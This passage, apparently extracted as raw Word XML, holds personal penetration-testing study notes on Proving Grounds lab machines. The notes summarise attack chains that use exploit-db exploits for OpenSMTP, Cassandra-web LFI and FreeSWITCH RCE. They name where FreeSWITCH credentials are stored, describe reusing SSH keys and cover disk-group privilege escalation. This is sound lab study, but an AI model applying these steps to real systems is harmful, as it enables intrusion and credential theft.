        <w:t xml:space="preserve">PG Practice, there was a service called Zookeeper on port 2181 that you could exploit for a foothold. Very easy and quick.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jlcirsllpmon" w:id="538"/>
      <w:bookmarkEnd w:id="538"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSMTP (version of SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1264">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bratarina</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw OpenSMTP (here it was version 2.0.0 but the exploit was for anything less than 6.6.2. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1265">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used exploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1266">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47984</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1267">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they used metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ocy06xypwkf" w:id="539"/>
      <w:bookmarkEnd w:id="539"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cassandra-web and Cassandra Query Language (CQL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw a Cassandra-web website on port 3000 of </w:t>
      </w:r>
      <w:hyperlink r:id="rId1268">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Clue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. And this writeup gives us a quick guide on how to use the CQL commands to enumerate the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is another good </w:t>
      </w:r>
      <w:hyperlink r:id="rId1269">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Clue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1270">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writeup (the first one), they:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used Cassandra Web 0.5.0 exploit from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1271">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploitdb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they saw freeswitch-event on port 8021</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They try the freeswitch RCE from exploitDB but authentication doesn't work, so they need to find the right password (the script uses a hardcoded default password)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1272">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47799</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we were supposed to find out that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/freeswitch/autoload_configs/event_socket.conf.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where freeswitch credentials are stored</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So using LFI, we can read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then now that they have credentials for freeswitch, they can use this freeswitch exploitdb RCE. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to do this, you need to edit the script and replace the default password "ClueCon" with your own password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1273">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47799</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for priv esc, they saw they could run /usr/local/bin/cassandra-web as sudo. It gets kind of messy, so you can read both witeups to see how they used it to get root. They used it to read SSH keys that were for another user but if you re-used them for root user than SSH worked. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a hacktricks for Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1274">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/network-services-pentesting/cassandra.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apparently it's often seen in 9042/9160</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_df9ph4shucct" w:id="540"/>
      <w:bookmarkEnd w:id="540"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disk group (6(disk))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1275">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fantastic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. They used the guide down below which teaches us how to enumerate which files we can view using this disk group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1276">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://vk9-sec.com/disk-group-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4991100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="133" name="image140.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image140.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1277"/>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39CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells us which files we can look at </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Beware of the "mounted on" which is the last column. This helps show you the full path to enumerate the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And as you can see based on the "mounted on," the root directory (/) is mounted on /dev/sda2 so we should look there (as explained in the guide)</w:t>
      </w:r>
    </w:p>
